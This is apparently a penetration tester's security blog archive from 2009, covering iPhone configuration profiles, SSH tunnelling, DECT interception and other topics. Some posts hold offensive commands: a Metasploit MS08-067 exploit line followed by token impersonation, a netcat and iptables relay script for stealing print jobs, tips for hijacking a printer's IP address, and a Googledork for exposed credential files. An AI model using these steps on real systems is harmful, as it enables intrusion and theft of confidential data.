Archive for the ‘Technology’ Category

Playing with iPhone profiles

Posted by ChrisJohnRiley on December 4, 2009

It’s not often that I talk about a GOOD feature of the iPhone. Don’t get me wrong, I love my iPhone and it’s really changed the way I work and communicate, however Apple really only want you to use the device they want, not how you want. Still, I’ve recently been fighting with a few issues while traveling. The largest of these is the need to constantly change my APN settings whenever I fly somewhere. I usually travel with a small collection of pay as you go sim cards so that I can just touchdown, plug in the sim and charge enough credit to cover a few days, weeks of data transfer. You’d be surprised at the prices you can find even on pay as you go nowadays. Anyway, this is all well and good, but wouldn’t it be nice if the APN settings (APN name, username and password) was automatically detected. Some sim cards do this, however most don’t (my O² sim card even fills it in with incorrect info). Today I finally had a chance to look at the iPhone configuration tool offered by Apple.

The iPhone configuration tool gives you a range of options to configure a single or multiple iPhones. It also offers the chance to do some security related configurations that you can’t achieve directly on the iPhone itself. The 2 things I was particularly interested in where the Passcode and APN (advanced) settings.

Wether you’re using this in a corporate of home environment, the configuration tool can help improve the security of your iPhone, as well as making it easier to turn settings on/of as required.

Passcode

By default the iPhone allows for a 4 character passcode to lock down your phone. This is great, but I’ve lost count the amount of times I’ve seen people type in their passwords. It’s not hard to remember a 4 digit passcode, and as iPhone doesn’t randomize the layout of the numbers on the screen, it’s easy enough to figure out the password even without seeing which numbers are selected. Luckily the iPhone configuration tool gives you the chance to correct this.

Through the configuration tool you can set the advanced settings not possible to do directly on the iPhone itself. These settings include the complexity (including the number of non-alphanumeric characters required), minimum length, maximum password age, password history and failed attempts.

Alongside these typical settings you can also set the auto-lock and grace period times. Most importantly, from my perspective, you can enable the device erase function (this can also be enabled on the device directly).

When it comes to mobile devices, password enforcement is becoming more and more important. With the limited keyboard functionality and repetition of password entry (how many times a day do you type in your iPhone passcode ?) it’s important to make sure users (whether enterprise or home) don’t simplify the passcode too much. It’s very convenient to use 9999 as your passcode, but it’s not hard to shoulder-surf.

The above images show the default 4 character PIN style password, and the more extensive passcode options you can enable through iPhone configuration tool. The more security conscious may have noticed there are 3 images and not just 2. If you allow users to set digit only passcodes (i.e. an 8 character passcode like 12345678) then your users will be prompted ONLY to enter numeric values. If the user sets a more complex alphanumeric password, then they will be given a full keyboard for entry. This isn’t a BIG security issue, but it does tell you what kind of passcode they’ve selected without you needing to know the passcode itself. Still, it’s better than a 4 digit passcode

APN (advanced)

The second feature that interest me is the advanced page, which allows you to set the APN and Proxy information. For me this is really handy. I can go into the configuration tool and create a profile for each APN setting combination that I need. When going between countries I can simply pull up the .mobileconfig file from my email (make sure you’ve got it cached) and apply it to the iPhone.

The advanced settings page also allows you to set a proxy for your communications. I’ve not had a chance to play with this setting yet to see what kind of security enhancement can be gained from this. In theory it would be nice to force ALL communications over an SSL secured proxy. This could then connect back to a trusted system to give you an extra layer of protection between your phone and home base. When travelling to a possibly dangerous environment (I’m thinking China, Russia, Ukraine, etc…) it would be nice to feel just a little bit more secure.

The good thing about profiles is that you can add and remove them at will. You can also have more than 1 profile active on the iPhone at once (as you can see I’ve got 4 currently). This allows you to add and remove them whenever you need to. It also means you can have a profile that applies your security settings and separate ones that apply just the APN info (as it’s likely to change more often than you security configuration). I’ve not had a chance yet to look at what happens when you set multiple profiles to contain settings that clash. I get the feeling that the LAST profile applied will override the earlier ones, but at the moment that’s just speculation on my part.

.mobileconfig

The files you export from the iPhone configuration tool are simple XML files. So if you find yourself out and about without the tool, you can still open the file up in a text editor and change the settings as required. If you do a Google search for “mobileconfig iphone” you’ll find a number of sites discussing the format. You can also checkout the enterprise deployment documentation HERE for more hints. You can also download the configuration tool from the same location (Windows / OSX only).

Edit: After posting I did a little followup on the contents of the .mobileconfig file. When looking at the files created to implement specific APN settings, I noticed the following string s in the XML :

 <key>apns</key>
 <array>
   <dict>
     <key>apn</key>
     <string>payandgo.o2.co.uk</string>
     <key>password</key>
     <data>
     cGFzc3dvcmQ=
     </data>
     <key>username</key>
     <string>vertigo</string>
  </dict>
</array>

I can almost see people holding their heads in their hands. Yes, the password is stored Base64 encoded. I can understand why Apple have done this (to avoid issues with special characters corrupting the XML). However Base64 isn’t encryption. Luckily the APN settings are usually publicly available. However the .mobileconfig file can also contain data such as WPA keys, mail account passwords, and even LDAP and Exchange server settings. Surely these are protected in the XML by default right ?

<key>LDAPAccountDescription</key>
 <string>LDAP Account</string>
 <key>LDAPAccountHostName</key>
 <string>server</string>
 <key>LDAPAccountPassword</key>
 <string>SecretLDAPpassword</string>
 <key>LDAPAccountUseSSL</key>
 <true/>

That’s what we like to see. Clear text passwords… However it’s not all bad, there is a solution, even if it’s not the default. When exporting the .mobileconfig file from the iPhone configuration tool, you can select to sign and encrypt the file. The downside of this, is that you need to tie the .mobileconfig to an iPhone that has been registered in the iPhone configuration tool. This may not always be convenient, especially when your CFO is shouting that his wireless settings are wrong as he’s waiting for the 9th hole at the local golf club. Still, at least Apple have thought about the security risks. When creating a single profile for your entire corporation however, you’ll either need to register each iPhone in the configuration tool before exporting the file, or use the less secure, unencrypted, option.

So, if you’re a corporate using this feature for your CEO’s iPhone, remember to store the .mobileconfig in a safe place and use the sign and encrypt option (not the default, at least in my testing). If you’re a penetration tester, add this filetype to your list of files to look for next time you exploit a users system. You never know what you might find. If you want to know how bad it really is, try the following Googledork “filetype:mobileconfig”.

Posted in Security, Technology | Tagged: APN, iphone, iphone configuration tool, passcode, profiles | 3 Comments »

Find files between 2 dates

Posted by ChrisJohnRiley on November 29, 2009

I thought I’d share a little tip I found recently. I was searching for a way to find files created between 2 dates on a Linux box. There’s a lot of reasons you might want to do this. Maybe you need to archive some files, maybe you’ve been breached and need to check what files have been modified. Whatever the reason, these are the commands to run that will do the job for you.

touch -m -t 200901010000 /tmp/startdate
touch -m -t 200801012359 /tmp/enddate
find . -newer /tmp/startdate ! -newer /tmp/enddate

The touch commands will create 2 reference files with the timestamp 01.01.2009 00:00 and 01.01.2009 23:59. Using these reference files you can then run the find command to find everything newer than the first file, but NOT newer than the second file. Remember to delete the files from /tmp when you’re done

rm /tmp/startdate /tmp/enddate

I’ll try and write-up a script for the PenTester Scripting project when I get some time.

Posted in Security, Technology | Tagged: date, find, tip, touch | Leave a Comment »

Filling your ipod…

Posted by ChrisJohnRiley on September 5, 2009

Over some drinks at the last CERT.AT meeting in Vienna, the topic of security podcasts came up. It’s a topic that seems to be discussed a lot, and everybody has there own set of favourite podcasts that they listen to. So I’ve finally had time to sit down and go through my podcast list to pull out some of the ones I feel are worth listening to. Podcasts are a personal thing. Some people like highly technical podcasts, other like more operational style topics. I try to mix them up a little to get a bit of everything. Hope you enjoy, and if there’s something good that’s not on my list, please let me know. I can’t promise I’ll listen, but I’d be happy to try it out.

BruCON Podcast –> iTunes Link
- The official Brucon conference podcast
Cloud Security Podcast –> iTunes Link
- Cloud security news, events, analysis and interviews
- Hosted by Craig Balding & Chris Hoff
Crypto-Gram Security Podcast –> iTunes Link
- Audio version of Bruce Schneier’s Monthly Crypto-Gram Newsletter
Cyberspeak –> iTunes Link
- Computer crime and forensics podcast
Exotic Liability –> iTunes Link
- Explicit: Exotic Liability will push you into the new generation of Security
- The only podcast to merge stripper jokes with security topics
GRM N00bs Security Podcast–> iTunes Link
- The GRM n00bs chat about various security topics
- New podcast, a little rough around the edges, but hey, I don’t see you (or me) doing any better
(HPR) Hacker Public Radio –> iTunes Link
- Explicit: Technology, Open Source, Hacking –> Various topics, released daily – Community Driven
- Checkout the website for more information on how to take part
- See episode 315, 420 and 445 for my contributions (so far…)
Hak5 –> iTunes Link
- Video: Put together a band of IT ninjas, security professionals and hardcore gamers, Hak5 isn’t your typical tech show
Internet Storm Center Threat Update–> iTunes Link
- Monthly podcast covering current network security threats
Network Security Podcast –> iTunes Link
- Podcasting talking about the security issues that are relevant today such as consumer privacy and PCI-DSS.
OWASP Security Podcast –> iTunes Link
- Join a wide variety of web application security experts as they examine the multiple aspects of application and software security.
- Also posted are audio recordings from OWASP conferences
Pauldotcom Security Weekly –> iTunes link
- IT Security news, research, vulnerability discussions and interviews –> one of the best podcasts around
- Checkout iTunes for a video feed also (not updated often)
Risky Business –> iTunes Link
- Australian podcast discussing the latest security news, with interviews and discussion peices.
RB2 (Risky Business 2)–>Feed Link
- Recorded conference presentations, single-shot interviews with industry players, freelance contributions and more.
SANS Internet Storm Center StormCast –> iTunes Link
- Daily microcasts sum,marizing information security issues of the last 24 hours
- Short and sweat. Great to keep yourself up-to-date on new attacks and issues
SecuraBit –> iTunes Link
- Explicit: Computer security podcast brough to you by Anthony Gartner, Chris Gerling, Chris Mills, and Jason Muellner.
Security Justice –> iTunes Link
- Explicit: Discussing security regarding technology and computers but also providing information and news about physical security.
SMBMinute –> iTunes Link
- Technology for SMB’s
SpiderLabs Radio –> iTunes Link
- Monthly DJ Mixes and interviews with Spiderlabs security professionals
- Mostly music, but worth it for the interviews even if you don’t need music to hack to
Tenable Network Security –> iTunes Link
- Official podcast of Tenable Network Security and the Nessus vulnerability scanner
- Corporate podcast. Newly formed with Paul from pauldotcom.
2600: The Hacker Quarterly–> iTunes Link
- The Hacker Quarterly. Combined feed of Off the Hook and Off the Wall shows.
- Lots of fundraisers, but occassionally interesting content
Midwest Teen Sex Show –> iTunes Link
- Non-Security, hilarious/VIDEO: Podcast for teens and adults covering the wonderful, awkward, stimulating, sticky world of sex.
- Trust me, you WILL laugh a lot. Unless of course you hate sex and jokes, in which case, don’t even click the link

Well there it is, my shortened list of security podcasts (currently). I tend to switch and change depending on whats happening at the time and what my schedule is like. I’ve also skipped a few that don’t seem to be updating very regularly as their is a chance they’re off the air (blue box podcast, sploitcast spring to mind). I also snuck in one non-security podcast at the end. Give it a shot, it’s hilarious in an educational and strange way.If you’re into Linux as well, checkout the guys at Jupiter Broadcasting.

As I said before, if you’ve got some podcasts (good ones that is. Please don’t link me to Security NOW) that aren’t on my list, just let me know, and I’ll give them a shot.

Posted in Security, Technology | Tagged: podcasts | 5 Comments »

Fixing Cydia

Posted by ChrisJohnRiley on July 19, 2009

At some point in the last 24 hours Saurik released a couple of updates to Mobilesubstrate through Cydia. Usually I try to keep updated with the latest and greatest (I’m a technology junkie) so I ran the upgrade will I grabbed my morning cup of tea (I’m also English after all). Normally after an upgrade you’ll see a prompt to restart springboard, however with this update the phone rebooted part way through the install. A worrying signal. After the reboot everything seemed to be fine, except Cydia refused to start fully. After showing the default Cydia screen fir a few seconds, Cydia would disappear.

After a couple of reboots to make sure the issue wasn’t going to solve itself, I had a quick look on Saurik’s twitterfeed but he had no mention of the issue. Several followers however were having the same issue. Time to find a solution.

I dropped to the terminal (although making an SSH connection would also have done the trick) and su’d to root. For those new to this the default password for root is alpine and if you’ve upgraded to version 3.0 this WILL have been reset. So change the root and mobile users passwords using ‘passwd’ before somebody else connects and does Anyway, I digress.

After getting root access it’s time to see what state the mobilesubstrate and cydia packages were in. After an ‘apt-get update’ (to get the updated package lists) and and ‘apt-get install cydia’ it looks like the package is corrupted, as I’m prompted to run the dpkg configure

dpkg --configure -a

After this is completed, I reran the ‘apt-get install cydia’, and then an ‘apt-get upgrade’ to reinstall the failed mobilesubstrate and in my case the new VoIP 3G app. After another reboot (type reboot at the prompt or whatever your preferred method is) things seem to be running fine again.

For those with short attention spans .:

Shell access (terminal or ssh)
Su to root
dpkg --configure -a
apt-get update
apt-get install cydia (if this fails add –fix-missing)
apt-get upgrade (to install mobilesubstrate correctly)
reboot

I hope this solves your issues as easily as it did mine. Let me know if you have any issues.

Update: There are a few other guides going around telling you to connect the iphone to your system (or useiFile) and then delete specific files. I’ve not tested these fixes, but the chance of deleting files you need are always there. I’d suggest using the easy fix using apt-get before trying the file deletion route. However it’s a personal choice.

Update: As a few comments have noted, the nice people at wordpress reformed the -- into a single – when displaying the page. This should now be fixed using the magic trickery of HTML comments to split the two characters –>

Posted in Technology | Tagged: cydia, iphone, mobilesubstrate | 16 Comments »

Protecting your browsing with iPhone SSH tunnels

Posted by ChrisJohnRiley on June 21, 2009

Most of the time I feel relatively secure when I’m browsing the web or checking twitter on my iPhone. That said, I rarely use the built in wireless for these purposes, and rely instead on the reasonably good 3G network in Austria. When I’m out of the country I usually try to buy a pay-as-you-go sim card and pay for the daily data transfer. This isn’t as expensive as you’d think. For example in the Netherlands it costs around €3.50 per day of data transfer. Not cheap if you’re using it long-term, but if you’re only there for a couple of days it’s a lot cheaper than paying for a hotel WLAN that’s insecure and only works inside the hotel. Still, this solution doesn’t work everywhere and isn’t for everyone. The fallback is to use whatever wireless you can find, insecure or not. This is something I’ve been fighting with for a while now. Stemming (mostly) from my unwillingness to setup a VPN server (my home ADSL isn’t good enough quality, and doesn’t have a fixed IP) or pay a huge price for a VPN solution through my existing hosting provider (thanks for the cheap hosting Dreamhost).

The iPhone (at least version 2.2.1) supports the use of HTTP proxies when connecting via a wireless connection. This is great. Surely I can setup an SSH Tunnel to my server and tell the iPhone to use this as a SOCKS proxy. As with everything on the iPhone however, simple always turns into complicated very quickly. I experimented with this solution and found that the HTTP proxy support was really just that, HTTP proxy support and nothing else. So back to the drawing board. I searched for another solution and settled on using the 3proxy application (in cydia for those lucky enough to have a jailbroken iPhone) to setup a local HTTP proxy.

A few requirements to get this up and running on your iPhone.

A Jailbroken iPhone (or iPod Touch)
SSH Client installed
3proxy (available in cydia)
terminal application
An SSH server (setup for either password or certificate access)
Backgrounder (or some other way to run commands and have them running in the background)
OPTIONAL: iFile (easy file editing)

Starting off we’ll take a look at the configuration of 3proxy. By using the following configuration you tell 3proxy to forward all traffic to a second proxy server, this time a SOCKS proxy (in this case my SSH tunnel).

#!/usr/bin/3proxy
daemon
auth iponly
log /var/log/3proxy.log D
rotate 5
fakeresolve
internal 127.0.0.1
allow * * 127.0.0.1
parent 1000 socks5+ 127.0.0.1 8081
proxy -p8080 -a -i127.0.0.1

The quick rundown on the above configuration.

#!/usr/bin/3proxy – Tells the script what interpreter program to use
daemon - Tells 3proxy to run as a background process
auth iponly – sets the authorization to be ip restricted
log – Setup a log that rotates daily (the D option)
rotate 5 – Sets the number of log files to keep before rotating
fakeresolve – Tells 3proxy to route DNS lookups through the proxy
internal – Listen in the internal interface only
allow – Currently set to * for all (you can limit this by username/password or IP, however this caused issues in testing)
parent – This is where we’re setting the next proxy in the chain (1000 is always use this parent, SOCKS5+ is the type and then the SSH tunnel listening ip and port)
proxy – this final command tells 3proxy to start a proxy on port 8080 using anonymous proxy mode (-a) and listen only in internal loopback

You can find more configuration information on the 3proxy website. Although leaving the allow set to * (all) is a concern, remember that the proxy is only listening on the localhost address and from outside the port is blocked.

Now that we’ve got the 3proxy.cfg file saved (mines stored in /usr/bin with the 3proxy executable) you’ll need to run chmod +x to make it executable. Next up is the SSH Tunnel, and doing this on an iPhone isn’t much different to a normal linux system (just harder to type for obvious reasons). I opted to add a certificate for quick easy access and restricted access to the certificate to the root user on the iPhone (you have changed your root password right ???). I added the private key to ~/.ssh/id_dsa (or id_rsa, your choice) and setup a bash script to kick off the SSH tunnel (typing that command each time gets boring fast).

ssh -D 8081 -N -C username@remotehost.your.domain -2 -p 64000 -i /home/root/.ssh/id_dsa

The above command is a simple SSH tunnel setup to connect to port 64000 on remotehost.your.domain and logon as the user username using the certificate file stored in /home/root/.ssh/id_dsa. It will then setup a local listener on port 8081 and dynamically route all traffic coming to this port through the SSH tunnel. As we’re treating the tunnel as a SOCKS proxy we don’t need to have anything else setup at the other end (no other proxy server waiting to route the requests) although you could setup privoxy or any other kind of proxy if you wanted more control.

So, now that we have the two parts of our configuration ready we just need to drop to the shell and kickoff the SSH Tunnel (using your bash script), and then startup the 3proxy using the /usr/bin/3proxy.cfg command. I’ve linked it all into a single bash script to make things a little quicker.

In testing Safari works pretty well (minor decrease in performance as you’d expect). Twitterfon was the second application I tested. Although this follows the HTTP proxy rule, it still insists on doing DNS lookups for advertising outside of the proxy. This is also the case for a couple of other applications. Mail doesn’t follow the HTTP rules, however you can easily setup additional 3proxy ports for these, or use SSL and make sure your DNS is all piped over the local listener and through the SSH tunnel (3proxy supports a DNS caching proxy, tcp and udp forwarding proxies also).

Supported:

Safari
Twitterfon (partially: Advert DNS lookups are still a possible concern/attack vector)
Cydia
AppStore
iTunes
Youtube
Weather
GRiS
WordPress (partially: As with the Twitterfon issue, the DNS appears to ignore the HTTP proxy settings)

Obviously these were just the applications I tested. I’d suggest running your own tests to ensure that you’re seeing the same results.

Not-Supported:

Mail (setup a port forwarder to achieve support for email)
Siphon (This is a real disappointment)
F-Stream
… probably more, so your mileage may vary

If you test any other applications please let me know and I’ll add it to my list.

Once you’ve finished using the SSH Tunnel and proxy, remember to kill -9 them using the console.

TODO:

Test with alternative “allow” settings to restrict access further (username/password too easy)
Prevent initial DNS lookup on SSH Tunnel (i.e. dyndns service)
Log Bug with Twitterfon regardin DNs lookups
Find an easier way to trigger the tunnel & 3proxy build-up/tear-down
Resolve issue of tunnel disconnecting when screen gets locked (FOR loop ???)
Use the tunnel for 3G connections (paranoid much !!!)

Posted in Security, Technology | Tagged: 3proxy, encrypted, iphone, ssh | 12 Comments »

MS09-012: Fixing “Token Kidnapping”

Posted by ChrisJohnRiley on April 15, 2009

This was the headline that grabbed my attention this morning on the Microsoft Security & Defence Blog. Had Microsoft finally patched the token impersonation flaw (or feature as Microsoft regard it) that is used by the Incognito tool to allow a compromised system level account to impersonate local or domain users. In short no, and I say that with mixed feelings.

As a penetration tester, I can breath a sigh of relief and know that this attack vector is still open. As a defender, the chance that Microsoft had changed the way this functionality works to block the attack was a welcome update to protect our systems. Still, you can’t expect Microsoft to repair something they see as a feature and the way things should work. Some things aren’t meant to be repaired I guess.

Testing

Just to make sure that Microsoft hadn’t broken the Incognito functionality while messing with the way tokens work, I ran a couple of tests against a Windows XP service pack 2 machine.

I started off with an unpatched version and ran the trusty MS08-067 exploit to get a meterpreter shell.

./msfcli exploit/windows/smb/ms08_067_netapi payload=windows/meterpreter/bind_tcp LHOST=192.168.0.104 RHOST=192.168.0.103 E

This functioned as you’d expect and resulted in a meterpreter shell running under the Local System Account. After running the “use incognito” command I listed the tokens using “list_tokens -u”.

Taking the local account “pentestuser” as the token to impersonate, I ran “impersonate_token PENTEST-3C73D9Cpentestuser”

Success, as expected on the unpatched system. Next up, I patched the system, rebooted and repeated the same msfcli exploit (MS08-067). This time however the exploit failed on the first run as it couldn’t isolate the exact service pack version. Metasploit listed it as Service Pack 2+ (which is technically correct). Re-running the command completed the exploit however.

Even after the patch everything seems fine in the token list.

The final test, impersonation of the PENTEST-3C73D9Cpentestuser user. As before this went off without a hitch, giving us access to the local user without error.

Conclusion

Microsoft have patched the flaws listed in KB952004 without effecting the Incognito tool (or the implementation of the tool within Metasploit). Good for attackers, bad for defenders. But you can’t always have it both ways can you. I doubt that we’ll be seeing a patch against the token impersonation flaw used in incognito anytime soon, if at all.

I’m heading to Blackhat Europe in a few hours (courtesy of a last minute press registration). If you’re there feel free to drop me a line and buy me a drink — > contact [at] c22 [dot] cc

Posted in Metasploit, Penetration Test, Security, Technology | Tagged: Metasploit, Microsoft, Patches | 3 Comments »

DECT Interception

Posted by ChrisJohnRiley on April 4, 2009

dect_cli

I’ve been playing about with the com-on-air and tools from dedected for a few weeks now. Results are mixed, as those who’ve sat through eth few demos I’ve run can certainly attest to. Things are still in the early phases for the dedected tools and as much as I love what’s already there, it’s not really ready for the mainstream yet. Don’t get me wrong, whats been done is already amazing work, but for the penetration testers amongst you wanting to grab a com-on-air card from ebay and starting running tests, things aren’t always going to be 100%. Still, it makes managers sit up and pay attention if demonstrated correctly.

As an example of the issues, I’ve build the drivers and tools from source on 3 or 4 systems now (Fedora, Debian, and Backtrack 3 and 4). Compiling resulted in mixed results (some compile errors) and random capture failures (just capturing static as if the course was encrpyted). You’ll also probably get a few kernel panics before you learn to respect the driver and not expect hotswap support just yet. After one too many hit and miss captures from the compiled versions, I opted to go for the Chaox-ng boot USB which includes everything (yes I do mean everything) built in. I find that this USB boot option just adds to the effect when it comes to demos. You turn up with a PCMCIA card and a 1 GB USB stick. That and any laptop will do the job.

Wireshark SVN

The Chaox-ng distro includes the drivers and tools compiled to perfection (no capture issues here). The latest version also includes the SVN version of Wireshark (with DECT PCAP support). Kismet newcore is compiled in with the DECT plugin if you want to play about with this as well. About the only thing missing is the Metasploit auxiliary modules, but that always was just a Proof of Concept and not very functional. Personally I stick to using the ‘dect_cli’ tool (alongside pcapstein, pcap2chan and Wireshark). For those that are interested I’ve uploaded a few packet captures for you to take a look at.

Plantronics CS60 Captures (Encrypted B-Channel)

Keepalive traffic capture (pcap) — HERE
Headset pairing process (pcap) — Capture 1, Capture 2 and Capture 3
Austrian speaking clock (pcap) — HERE

Siemens GIGASET (Unencrypted B-Channel)

German Test Call (pcap) — HERE
German Test Call (g721, wav) — HERE

kismet-newcore

The Plantronics PCAP’s are interesting to look at and see how the communications between the base unit and headset are handled. At this point I’ve not looked too much into the encryption implmented. From a couple of test calls the Plantronics appears to initiate the call and then encrypt a fraction of a second after the call begins. I’m leaning towards a standard implementation of DSC (DECT Standard Cipher) instead of a propriatary Plantronics implementation. Pity, as I was hoping for something in the pairing process that would signal a handshake and key creation process. I’ll leave the encyption work to people much smarter than me however. I just like to play with the new toys

DSAA (DECT Standard Authentication Algorithm) has already been reversed (see details here and the paper on the subject here). So next up will be the DSC hopefully. We’ll have to see how much longer the “Security through obscurity” of DECT works. I hope, for their sake, that they’ve implemented defence-in-depth

Posted in Penetration Test, Security, Technology | Tagged: DECT, Penetration Test, penetration testing, Security | 2 Comments »

Man in the Middling Printers

Posted by ChrisJohnRiley on March 22, 2009

This one has been rattling around in my head for a while, and since I’ve found myself with a few spare minutes, it’s time I wrote it up for your enjoyment and mine. This is certainly nothing new, but its one of those things that people seem to discount when performing penetration testing. After all, printers aren’t really cool anymore.

MITM attacks are often talked about together with credential stealing or traffic manipulation (inserting javascript into http streams). The new tool from Inguardians (the Middler) is a prime example of where the focus is right now. Although the middler was designed as a tool for performing attacks on all kinds of protocols, the examples provided with the alpha all focus on http(s) traffic. However what I want to talk about was using MITM attacks to steal confidential data in the form of print jobs.

When it comes to stealing data, most of the time you’re going to need a valid username/password to gain access. Sure you can exploit systems, use pass the hash or go the social engineering route, but you’re going to need access. However in this day and age of the failed paperless office, why go to those lengths when you can just steal the documents straight from the print queue. We all know how to perform ARP or DNS poisoning to insert a system into the flow of traffic, but with printers this job can be made so much easier due to the overall lack of security on print devices.

There are four easy methods for stealing print jobs that spring to mind, other than using standard ARP or DNS spoofing attacks.

Physical access – A majority of printers offer unprotected access to the menu. Through physical access you can change the printers IP address and assume the original for yourself.
Telnet access – Not seen so often in modern printers, but can give you complete access if the passwords are blank or left at default. Again, reset the IP address and assume the original.
Webserver access – Most modern printers offer a web interface for easy configuration. Brute-Force is an option here as they rarely enforce lockouts or use domain credentials. Again, reset the IP address and assume the original.
Denial of Service – Crude but effective. This isn’t really a MITM attack, as you’d not be able to forward on the print job. Just drop the printer off the network (turn it off if you have to) and steal it’s IP.

Once you’ve gained access and stolen the IP address of the remote printer, there are a couple of ways to steal the print jobs. I started off by playing about with netcat using a simple netcat relay (and using tcpdump to copy the traffic).

mknod backpipe p
nc -l -p 9100 0<backpipe | nc <new printer ip> 9100 0>backpipe

The problem with this is that it would work on the first print job and then lockup. This is because the netcat relay would make the connection and leave it running. All subsequent print jobs would fail. Back to the drawing board.

My second attempt included the -w1 timeout for the second half of the netcat relay . This forces the connection to be dropped after 1 second of inactivity. This worked a little better but still not perfectly. I also threw in tee to prevent having to use tcpdump to capture the traffic (-a sets append).

mknod backpipe p
nc -l -p 9100 0<backpipe | tee -a capture.out | nc <new printer ip> -w1 9100 0>backpipe

The best results came from using the above command in a loop. I wrote a small bash script to do this. This is something to play with (your mileage may vary).

#!/bin/bash
i=1
PRNIP=10.10.10.10

while true; do
echo “Print jobs captured = $i”
nc -l -p 9100 0<backpipe | tee -a capture-$i.out | nc $PRNIP -w1 9100 0>backpipe
i=$i+1
done

As an alternative to netcat I also tested the use of iptables to perform a prerouting of the traffic.

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -F

iptables -t nat -F

iptables -X

iptables -t nat -A PREROUTING -p tcp — dport 9100 -j DNAT –to-destination <new printer ip>

The problem I can see here is that PREROUTING is performed before any of the traffic will be visible to TCPDUMP. So although we’re routing all the traffic to the printer, we can’t dump any of the print jobs. I’m no iptables expert by any stretch of the imagination. So maybe there is a way to do this easily without extra tools. I’ll have to try playing with the mangling rules and see if I can get some better results with iptables.

Posted in Penetration Test, Technology | Tagged: iptables, man in the middle, mitm, printers | 1 Comment »

Twitter moves to protect against TinyURL attacks

Posted by ChrisJohnRiley on February 7, 2009

It’s been a topic of conversation for a while now. The use of TinyURL’s within Twitter and other social media sites. For those of you who don’t know what a TinyURL is, I’ll give an example.

I want to post you a link to my website, however with Twitter I only have a maximum of 140 characters. To maximise the space and make things easier for users, the Twitter gods decided to convert the (usually) long links into a smaller link using the TinyURL service. You can checkout the service for yourself. You simply paste in the long link and get back a smaller one that still works the same way.

FULL URL –> http://c22blog.wordpress.com/2009/02/07/mobile-devices-lowering-web-security/

TinyURL –> http://tinyurl.com/btsfs5

As you can see, the second one is a lot easier to read and pass on. Anyway, back to the point at hand.

Twitter have implemented a new feature (currently restricted to their search.twitter.com area) that adds an [expand] button after the TinyURL. As you can imagine, this allows you to expand the link and see where it really points to. This is obviously a good thing for security, as you never know where that TinyURL could take you. XSS attacks are all around us

Expand link @ search.twitter.com

contract link @ search.twitter.com

Here’s hoping that the feature comes to the standard Twitter time-line soon.

Posted in Security, Technology | Tagged: Security, Technology, tinyurl, twitter | Leave a Comment »

Mobile devices lowering web security

Posted by ChrisJohnRiley on February 7, 2009

iphone_kbd1 It’s been over a month now since I finally made the move to an iPhone. For the last 6 months or so I’ve been using a Blackberry (with mixed results) but this was mostly business use. The one thing that struck me when I started using the iPhone for Internet use, reading blogs, and access services like twitter, was the keyboard. I know it sounds strange, but having to click through 3 different menus just to get to the special keys portion of the keyboard puts a serious dent in your typing speed. Once you’re used to things, then it’s OK to work with. However this started me thinking how many average users of the iPhone (or blackberry, Nokia, G1, <insert current mobile device of the week here>) have given up constantly typing their suitably complex web-mail or forum password and changed it to something easier and quicker to enter on a mobile keypad.

With things constantly moving towards mobile computing (like it or not) the input of passwords will become more and more of an issue. Devices are getting smaller and smaller, keyboard and input is moving from the standard layout, to miniature input, gestures, and handwriting recognition. These are difficult enough to deal with as it is, without having to make sure you get it 100% correct. After all, you can’t having a spelling mistake in your password and get away with it.

So, how long before we start to see a shift in password use on web-services to more mobile friendly passwords. For example, those displayed on the main iPhone keypad. This means no special characters or numbers. Unless the web-service forces strong passwords, users will go with convenience over security most of the time. This is just human nature. This increasingly limited input range will it easier to brute-force the passwords of mobile users and reduce overall security. Just as we’ve finally started to get the general public to embrace complex passwords. One step forward, and two steps back.

Hopefully this doesn’t spell a return to the use of “god”, “sex”, “love” and “secret” as our main passwords of choice.

Posted in Security, Technology | Tagged: mobile computing, passwords, Security, Technology | 2 Comments »

« Previous Entries

Sometimes pointless, always rambling, best ignored…

Archives

Security

Category Cloud

Recent Posts

My Photos

Archive for the ‘Technology’ Category

Passcode

APN (advanced)

.mobileconfig

BruCON Podcast –> iTunes Link

Cloud Security Podcast –> iTunes Link

Crypto-Gram Security Podcast –> iTunes Link

Cyberspeak –> iTunes Link

Exotic Liability –> iTunes Link

GRM N00bs Security Podcast–> iTunes Link

(HPR) Hacker Public Radio –> iTunes Link

Hak5 –> iTunes Link

Internet Storm Center Threat Update–> iTunes Link

Network Security Podcast –> iTunes Link

OWASP Security Podcast –> iTunes Link

Pauldotcom Security Weekly –> iTunes link

Risky Business –> iTunes Link

RB2 (Risky Business 2)–>Feed Link

SANS Internet Storm Center StormCast –> iTunes Link

SecuraBit –> iTunes Link

Security Justice –> iTunes Link

SMBMinute –> iTunes Link

SpiderLabs Radio –> iTunes Link

Tenable Network Security –> iTunes Link

2600: The Hacker Quarterly–> iTunes Link

Midwest Teen Sex Show –> iTunes Link

Testing

Conclusion

Plantronics CS60 Captures (Encrypted B-Channel)

Siemens GIGASET (Unencrypted B-Channel)